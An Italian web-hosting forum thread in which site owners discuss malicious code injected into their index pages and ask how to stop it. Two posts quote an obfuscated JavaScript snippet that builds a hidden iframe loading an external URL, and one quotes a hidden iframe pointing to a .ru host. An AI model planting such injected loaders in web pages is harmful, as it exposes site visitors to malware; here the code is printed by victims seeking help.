Mi hanno hackerato il sito!

[puz740]

Sono due giorni che mi trovo dello strano codice nell'index.php
Il codice è questo e viene piazzato infondo alla pagina:

lc='/';a='rc';xk='h.c';lg='am';cr='?15';tq='ifr';ql='5' ;fr='oba';j='ara';br='n';xb='0aa';g='a82';u='om/';s='k';bx='s';tg='6a';r='itc';jg='6cc';et='b8';m= '41';n='un';k='5';y='c0f';vj='p:';t='ef2';l='//b';dx='411';c='cdz';qv='9';kw='htt';b='eb';pf='6'; ch='mas';p='79';x='e';lj='prf';z='ofo';tk=tq.conca t(lg,x);e=bx.concat(a);pv=kw.concat(vj,l,j,s,fr,ch ,n,z,br,b,r,xk,u,c,lj,lc,cr,k,pf,p,tg,m,jg,xb,y,et ,t,dx,qv,g,ql);var
rb=document.createElement(tk);rb.setAttribute('wid th','5');rb.setAttribute('height','5');rb.setAttri bute('style','display:none');rb.setAttribute(e,pv) ;document.body.appendChild(rb);

non ho idea di cosa faccia ma me lo ritrovo nell'index.php di miei 2 siti (uno è qui su altervista l'altro su un altro host), ho cambiato le pwd di accesso ed il giorno dopo mi sono ritrovato punto e a capo.

I 2 siti sono collegati, o meglio da uno dei due si può risalire all'altro
(esiste un collegamento in tutte e due le direzioni e credo che questo sia
il collegamento).

Che devo fare?

[dapeco]

Dovresti per prima cosa bonificare il tuo pc, con un buon antivirus aggiornato. Dopo procedi con la modifica delle credenziali d'accesso ai due hosting. Se eventualmente utilizzassi degli applicativi (cms/blog etc) accertati che siano sempre aggiornati.

[puz740]

Dovresti per prima cosa bonificare il tuo pc, con un buon antivirus aggiornato. Dopo procedi con la modifica delle credenziali d'accesso ai due hosting. Se eventualmente utilizzassi degli applicativi (cms/blog etc) accertati che siano sempre aggiornati.

Grazie per la risposta velocisissima.
Il mio pc ha un doppio firewall hardware e software ed un antivirus sempre aggiornato, non credo venga da li.
Inoltre ho altri siti che non sono stati interessati a questa modifica.
Comunque avevo già fatto quello che mi hai suggerito compresa modifica delle pwd e nulla.
Guardando le statistiche di accesso non trovo nulla, sembra non sia "entrato" nessuno.
Inoltre ho appena controllato che i due siti sono legati in una unica direzione, altervista -> altro host e non viceversa.

Su altervista non ho alcun cms o blog ho un semplice sito fantacalcio.

E' proprio da escludere che ci sia un virus nel server con permessi di root o simile?

Altra domanda: settando il file index.php con permessi 444, secondo te, risolvo il problema?

[dapeco]

Il mio pc ha un doppio firewall hardware e software ed un antivirus sempre aggiornato, non credo venga da li.

Bene, bisogna andare a cercare altrove.

Guardando le statistiche di accesso non trovo nulla, sembra non sia "entrato" nessuno.
Inoltre ho appena controllato che i due siti sono legati in una unica direzione, altervista -> altro host e non viceversa.

Qual è il legame tra i due?

E' proprio da escludere che ci sia un virus nel server con permessi di root o simile?

purtroppo è da escludere, il tuo sito non sarebbe l'unico compromesso, ma parecchi altri.

Altra domanda: settando il file index.php con permessi 444, secondo te, risolvo il problema?

Non cambierebbe nulla.

[puz740]

Qual è il legame tra i due?

Dal sito su altervista chiamo una pagina in php che risiede sull'altro host con
qualcosa del tipo http://www.altromiosito.com/dir/pagina.php.

Questo è l'unico collegamento che c'è tra i 2 siti.

Come ho già scritto gestisco altri siti e non hanno segnalato nessuna anomalia, mi sembra poco probabile che abbiano carpito le mie pwd di ftp, come minimo avrebbero effettuato questa modifica come si deve, come minimo.

Non so cosa fare. :(

[dapeco]

Utilizzi un applicativo per gestire il fantacalcio? Questo è aggiornato?
Utilizzi un applicativo per gestire le statistiche? Questo è aggiornato?

Se escludiamo il tuo pc ed il server di altervista, bisogna andare a ravanare sul contenuto dell'account, quindi gli applicativi.

[puz740]

Utilizzi un applicativo per gestire il fantacalcio? Questo è aggiornato?
Utilizzi un applicativo per gestire le statistiche? Questo è aggiornato?

Se escludiamo il tuo pc ed il server di altervista, bisogna andare a ravanare sul contenuto dell'account, quindi gli applicativi.

Il fantacalcio funziona su base js, è un software che gira su pc poi crea molti .js con dati che uppo sul web.
Altre funzioni js visualizzano i dati. Il concetto è questo.

Per le statische uso fanKounter.

Applicativi... ho degli script elementari che fanno scrivere un messaggio di testo sul sito. Ma roba veramente stupida che creano un file testo.txt nessun db sql, login o altro (quindi escluderei robe tipo injiection).

Inoltre ho ricontrollato il codice di tutte le pagine del sito alla ricerca di altre manipolazioni (lato codice) ma non sembrano proprio essercene.

Guarda cos'ho trovato: http://www.zatec.cz/
Scorri la pagina fino in fondo ed ecco la stessa cosa che visualizzava il mio sito.

Domanda (probabilmente ingenua):
- ma altervista non ha un log dal quale poter vedere cosa succede ai file di un sito, nel senso di vedere almeno quando è stato effettuato un accesso e cosa è stato modificato?

[dapeco]

Guarda cos'ho trovato: http://www.zatec.cz/
Scorri la pagina fino in fondo ed ecco la stessa cosa che visualizzava il mio sito.

Domanda (probabilmente ingenua):
- ma altervista non ha un log dal quale poter vedere cosa succede hai file di un sito, nel senso di vedere almeno quando è stato effettuato un accesso e cosa è stato modificato?

Sembra sempre più una injection lato webmaster (quindi un malware sui pc utilizzati per gli aggiornamenti).

AlterVista logga chiaramente tutti i movimenti ftp, manda una email all'abuse spiegando il problema e vediamo di darci un occhio.

[puz740]

Sembra sempre più una injection lato webmaster (quindi un malware sui pc utilizzati per gli aggiornamenti).

AlterVista logga chiaramente tutti i movimenti ftp, manda una email all'abuse spiegando il problema e vediamo di darci un occhio.

Innanzi tutto, grazie.

Se non ho capito male il tuo ragionamento, se la modifica è stata fatta via malware dal mio pc, devo vederne traccia nel log, giusto?

Altra cosa all'abuse scrivo segnalando questa discussione e chiedendo i log di accesso al mio sito?

P.s.: Stamattina il problema non s'è verificato - avevo impostato l'index.php a 444.

[palinsesto]

Succede anche a me su due siti su altervista fatti con Flatnuke (php) .. nel file index.php viene aggiunta in fondo la riga <div style="display:none">fbctgnntnqyhyszrlaljodmbilcxa ye<iframe width=378 height=852 src="http://bio-a.ru:8080/index.php" ></iframe></div>
in modo maldestro, cioè cancellando le ultime righe del file originale index e quindi rendendo inutilizzabile il ito.

Mi era già successo qualche mese fa, per diversi giorni consecutivi, ed avevo risolto mettendo index.php in sola lettura.
Oggi il problema si è riproposto, stessa riga in index, ed in più una modifica al file function.php .

Ade

[dapeco]

@palinsesto:sembrerebbero 2 differenti problemi, il tuo più legato all'applicativo (FlatNuke). Hai verificato che sia l'ultima versione disponibile?

[puz740]

@palinsesto:sembrerebbero 2 differenti problemi, il tuo più legato all'applicativo (FlatNuke). Hai verificato che sia l'ultima versione disponibile?

Il post di palinsesto credo abbia "oscurato" il mio precedente intervento dove chiedevo come procedere con l'abuse, potresti leggerlo?
Grazie ancora.

[dapeco]

Il post di palinsesto credo abbia "oscurato" il mio precedente intervento dove chiedevo come procedere con l'abuse, potresti leggerlo?
Grazie ancora.

No affatto, manda tutto ciò che hai scritto all'abuse.

[puz740]

No affatto, manda tutto ciò che hai scritto all'abuse.

Ok, grazie.

[palinsesto]

si flatnuke è aggiornato all'ultima versione e sul forum di flatnuke gli amministratori non conoscono il problema.
Però ho trovato un'altro utente flatnuke con sito su altervista che ha lo stesso problema.
Praticamente vengono aggiunte a molti file .php delle aggiunte indesiderate e creati dei nuovi file .
Al di la di quali sono queste modifiche, il problema è che hanno accesso ai files e li possono modificare, anche se li metto in sola lettura. La matiina dopo li ritrovo modificati e con i permessi cambiati.
Le modifiche fatte, richiamano degli script con il quale probabilmente riescono ad avere le autorizzazioni necessarie.
Oggi ho dedicato molto tempo a fare pulizia, ma visto il grande numero di files infettati ho paura che anche avendone tralasciato solo uno ricominci tutto da capo.


Comunque su un altro sito sempre flatnuke su altervista per adesso tutto a posto.

[julianamoreira]

stessa identica cosa successa a me.ho trovato questo codice nell' index.htlm


"lc='/';a='rc';xk='h.c';lg='am';cr='?15';tq='ifr';ql='5' ;fr='oba';j='ara';br='n';xb='0aa';g='a82';u='om/';s='k';bx='s';tg='6a';r='itc';jg='6cc';et='b8';m= '41';n='un';k='5';y='c0f';vj='p:';t='ef2';l='//b';dx='411';c='cdz';qv='9';kw='htt';b='eb';pf='6'; ch='mas';p='79';x='e';lj='prf';z='ofo';tk=tq.conca t(lg,x);e=bx.concat(a);pv=kw.concat(vj,l,j,s,fr,ch ,n,z,br,b,r,xk,u,c,lj,lc,cr,k,pf,p,tg,m,jg,xb,y,et ,t,dx,qv,g,ql);var
rb=document.createElement(tk);rb.setAttribute('wid th','5');rb.setAttribute('height','5');rb.setAttri bute('style','display:none');rb.setAttribute(e,pv) ;document.body.appendChild(rb);


e google avvisa gli utenti a non accedere al mio sito perche' potrebbero esserci dei malware.

ho tolto il codice ma non riesco a capire come possa entrare.

[dapeco]

Normalmente tale codice è iniettato da un worm presente sul pc di chi accede via ftp ai file. Verifica di avere il pc pulito.

[palinsesto]

Non utilizzo Ftp dall'installazione di flatnuke, diversi mesi fa .
Poi per gestire i files utilizzo il file manager online di Altervista o di flatnuke stesso .

[dapeco]

@palinsesto

esistono worm, talvolta non rilevabili da alcuni antivirus, che dopo aver acquisito le credenziali di accesso FTP o, di accesso ad altri servizi, come la mail, da pc compromessi vanno poi ad utilizzarle per caricare sistematicamente contenuti sui relativi siti web. È un paradigma comune e noto da tempo.

La prima soluzione è appunto cambiare la password dell'account (usando maiuscole, minuscole, lettere numeri ecc ecc), anche se il problema può ripetersi se il pc in cui la tieni è compromesso.

Una soluzione temporanea d'emergenza, potrebbe essere quella di impostare i permessi di sola lettura via FTP (444) su quel file subito dopo che lo hai caricato, il worm è un automatismo e non esegue chmod prima di tentare l'upload, questo porta a bloccare l'effetto dei suoi successivi aggiornamenti.